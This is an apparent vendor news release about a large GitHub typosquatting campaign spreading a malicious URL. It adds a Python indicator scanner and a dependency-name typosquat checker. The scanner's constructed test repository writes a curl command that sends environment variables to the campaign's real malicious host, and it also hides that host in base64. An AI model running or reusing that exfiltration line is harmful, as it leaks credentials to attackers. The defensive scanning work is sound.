08/08/2022 | News release | Distributed by Public on 08/08/2022 12:33
Recently, it was reported that more than 35,000 files in GitHub repositories contained a malicious URL, namely:
hxxp://ovz1.j19544519.pr46m.vps.myjino[.]ru
Many of these files were in cloned repositories: copies of popular projects, with malicious code added, that were re-published under the same or a similar name. This is a classic example of typosquatting, but on a scale not previously seen on GitHub. A typical infected file might look like:
(Screenshot: a cloned repository altered with malware to contain a backdoor; source: BleepingComputer)
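As an added illustration (not code from the original post, nor from BleepingComputer or ActiveState), the Python script below walks a checked-out repository and reports every file that contains the indicator above, either in plain text or base64-encoded, since injected code commonly hides its callback host inside an encoded blob. The indicator is kept defanged in the source and refanged at run time; the sample tree it scans (setup.py, build.sh, utils.py and a .git directory) is constructed inline and is not from any real project.

```python
"""Scan a checked-out repository tree for a known malicious indicator (added example)."""
from __future__ import annotations

import base64
import os
import tempfile
from pathlib import Path

# Indicator from the incident discussed above, kept defanged so this file
# never contains a live malicious URL.
DEFANGED_IOCS = ["hxxp://ovz1.j19544519.pr46m.vps.myjino[.]ru"]

# Directories that are not source and would only add noise or false hits.
SKIP_DIRS = {".git", "node_modules", "__pycache__", ".venv"}
MAX_BYTES = 5 * 1024 * 1024  # skip large binaries and build artifacts


def refang(indicator: str) -> str:
    """Turn a defanged indicator back into the literal string to search for."""
    return (indicator.replace("hxxps://", "https://")
                     .replace("hxxp://", "http://")
                     .replace("[.]", "."))


def encoded_variants(literal: str) -> list[str]:
    """Plain form plus its base64 form at each of the three possible alignments.

    base64 works on 3-byte groups, so the same substring encodes to one of
    three different strings depending on its byte offset inside a larger blob.
    The first group (when padded) and any partial last group are dropped so the
    variant matches wherever the literal appears inside a bigger encoded blob.
    """
    raw = literal.encode()
    variants = [literal]
    for offset in range(3):
        enc = base64.b64encode(b"\x00" * offset + raw).decode()
        start = 4 if offset else 0
        end = len(enc) - (4 if (offset + len(raw)) % 3 else 0)
        variants.append(enc[start:end])
    return variants


def scan_tree(root: str, indicators: list[str] = DEFANGED_IOCS) -> list[tuple[str, int, str]]:
    """Return (relative path, line number, defanged indicator) for every matching line."""
    needles = [(variant, ioc)
               for ioc in indicators
               for variant in encoded_variants(refang(ioc))]
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d not in SKIP_DIRS]
        for name in filenames:
            path = Path(dirpath, name)
            try:
                if path.stat().st_size > MAX_BYTES:
                    continue
                text = path.read_text(encoding="utf-8", errors="ignore")
            except OSError:
                continue
            for lineno, line in enumerate(text.splitlines(), 1):
                for needle, ioc in needles:
                    if needle in line:
                        hits.append((str(path.relative_to(root)), lineno, ioc))
                        break  # one report per line is enough
    return hits


def build_sample_repo() -> str:
    """Constructed sample tree (not real project files): one clean file, one
    with the callback host in plain text, one with it base64-encoded, and a
    copy inside .git that the scanner must ignore."""
    root = tempfile.mkdtemp(prefix="ioc-scan-")
    host = refang(DEFANGED_IOCS[0])
    blob = base64.b64encode(("url=" + host).encode()).decode()
    files = {
        "setup.py": "from setuptools import setup\nsetup(name='demo')\n",
        "build.sh": "#!/bin/sh\nmake\ncurl -s -d \"$(env)\" " + host + " >/dev/null 2>&1\n",
        "utils.py": "import base64\nC2 = base64.b64decode('" + blob + "')\n",
    }
    for rel, content in files.items():
        Path(root, rel).write_text(content, encoding="utf-8")
    Path(root, ".git").mkdir()
    Path(root, ".git", "config").write_text(host + "\n", encoding="utf-8")
    return root


if __name__ == "__main__":
    repo = build_sample_repo()
    for rel_path, lineno, ioc in scan_tree(repo):
        print(f"{rel_path}:{lineno}: matches {ioc}")
```

Run it against a freshly cloned repository before building or installing anything from it; a hit on the plain or encoded host is a hard stop. A literal-match scan only catches indicators you already know, which is why it complements, rather than replaces, verifying that a repository is the upstream project and not a look-alike clone.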
The threat here is twofold:
Typosquatting occurs when a bad actor:
Unfortunately, typosquatting has proven effective time and again, and it is one of the most common ways bad actors compromise organizations through their dependencies. Luckily, a number of best practices can help mitigate the risk of importing typosquatted code.
We all make typing mistakes, which makes us all susceptible to typosquatting. But there are a number of controls that organizations can put in place to catch those mistakes before they result in the import of a malicious package:
Security-conscious organizations may want to implement more than one best practice, creating a defense in depth strategy that not only seeks to prevent typosquatted code from ever entering the organization, but also scans for malware regularly throughout the software development lifecycle in order to catch anything that has inadvertently slipped through.
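One concrete control of the kind described above, as an added example (not ActiveState's code, nor a feature of its platform): a pre-install check that refuses dependency names which are not on a vetted allowlist but sit within one or two edits of a package that is, counting adjacent-letter swaps as a single edit and stripping decoy affixes such as a python- prefix before comparing. The allowlist and the requirements file below are constructed for the example.

```python
"""Flag dependency names that are suspiciously close to known packages (added example)."""
from __future__ import annotations

import re

# Constructed allowlist for the example. In practice this is the organization's
# vetted package index or lockfile, not a hardcoded set.
KNOWN_PACKAGES = {
    "requests", "urllib3", "numpy", "pyyaml", "python-dateutil",
    "cryptography", "six", "pip",
}

# Constructed requirements file mixing typos and decoy names with good ones.
SAMPLE_REQUIREMENTS = """\
requests==2.28.1
reqeusts            # transposed letters
urlib3>=1.26        # dropped letter
python-requests     # decoy prefix on a real name
numpy
pyyaml ; python_version < "3.11"
# a comment line
-r other.txt
cryptography[ssh]
six
"""


def normalize(name: str) -> str:
    """PEP 503 normalization: case-insensitive, runs of '-', '_' and '.' become one '-'."""
    return re.sub(r"[-_.]+", "-", name).lower()


def osa_distance(a: str, b: str) -> int:
    """Optimal string alignment distance: insert, delete, substitute, and swap of
    two adjacent characters. The swap matters because transposed letters are the
    most common typing mistake and plain Levenshtein counts them as two edits."""
    prev2 = None
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cost = 0 if ca == cb else 1
            v = min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + cost)
            if i > 1 and j > 1 and ca == b[j - 2] and a[i - 2] == cb:
                v = min(v, prev2[j - 2] + 1)
            cur.append(v)
        prev2, prev = prev, cur
    return prev[-1]


def strip_decoys(name: str) -> str:
    """Remove affixes commonly bolted onto a real name: python-/py- prefixes,
    -python/-py suffixes and trailing digits (e.g. python-requests, requests2)."""
    for prefix in ("python-", "py-"):
        if name.startswith(prefix) and len(name) > len(prefix):
            name = name[len(prefix):]
    for suffix in ("-python", "-py"):
        if name.endswith(suffix) and len(name) > len(suffix):
            name = name[: -len(suffix)]
    return name.rstrip("0123456789") or name


def check_dependency(name: str, known: set[str] = KNOWN_PACKAGES) -> dict | None:
    """Return a finding if `name` is not a known package but is within a small edit
    distance of one, comparing both the name and its decoy-stripped form."""
    n = normalize(name)
    if n in known:
        return None
    forms = {n, strip_decoys(n)}
    candidates = []
    for k in known:
        d = min(osa_distance(f, k) for f in forms)
        threshold = 1 if len(k) <= 5 else 2  # short names tolerate fewer edits
        if d <= threshold:
            candidates.append((d, k))
    if not candidates:
        return None
    d, k = min(candidates)
    return {"requested": name, "looks_like": k, "distance": d}


def parse_requirements(text: str) -> list[str]:
    """Pull bare package names out of requirements.txt lines, ignoring comments,
    option lines (-r, --index-url) and version specifiers, extras and markers."""
    names = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("-"):
            continue
        names.append(re.split(r"[<>=!~;\s\[]", line, maxsplit=1)[0])
    return names


def audit_requirements(text: str, known: set[str] = KNOWN_PACKAGES) -> list[dict]:
    """Findings for every requirement that looks like a typosquat of a known package."""
    findings = []
    for name in parse_requirements(text):
        finding = check_dependency(name, known)
        if finding:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in audit_requirements(SAMPLE_REQUIREMENTS):
        print(f"{f['requested']!r} is not on the allowlist but is {f['distance']} edit(s) "
              f"from {f['looks_like']!r}; refusing to install")
```

Run the audit in CI before `pip install -r requirements.txt` and fail the build on any finding. Exact allowlist matches are never flagged, so the check only adds friction for unknown names; very short names (three or four letters) will produce some false positives at distance 1, which is the right trade-off for a gate that a human then reviews. Note what this check cannot do: a cloned repository re-published under a wholly different name is not a near-miss of anything, which is why the page's advice to also scan for malware throughout the lifecycle matters.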
Securing the software supply chain is difficult and expensive because of the breadth and depth of the open source supply chain that most software development organizations depend on. Each link in the chain offers multiple points of entry for malicious actors, who will always look for the weakest one to exploit. This makes ensuring the integrity and security of publicly available code a complicated and costly problem for most organizations.
While no vendor currently provides a comprehensive, end-to-end supply chain solution, some, like ActiveState, have begun to offer a turnkey solution for use cases involving open source languages like Python, Perl, Tcl and Ruby. Such an out-of-the-box solution can save enterprises significant time, resources and money compared to a multi-vendor approach.
Want to understand how the ActiveState Platform can secure your software supply chain? Contact Sales, or sign up for a free ActiveState Platform account and try it out yourself.
Experienced Product Marketer and Product Manager with a demonstrated history of success in the computer software industry. Strong skills in Product Lifecycle Management, Pragmatic Marketing methods, Enterprise Software, Software as a Service (SaaS), Agile Methodologies, Customer Relationship Management (CRM), and Go-to-market Strategy.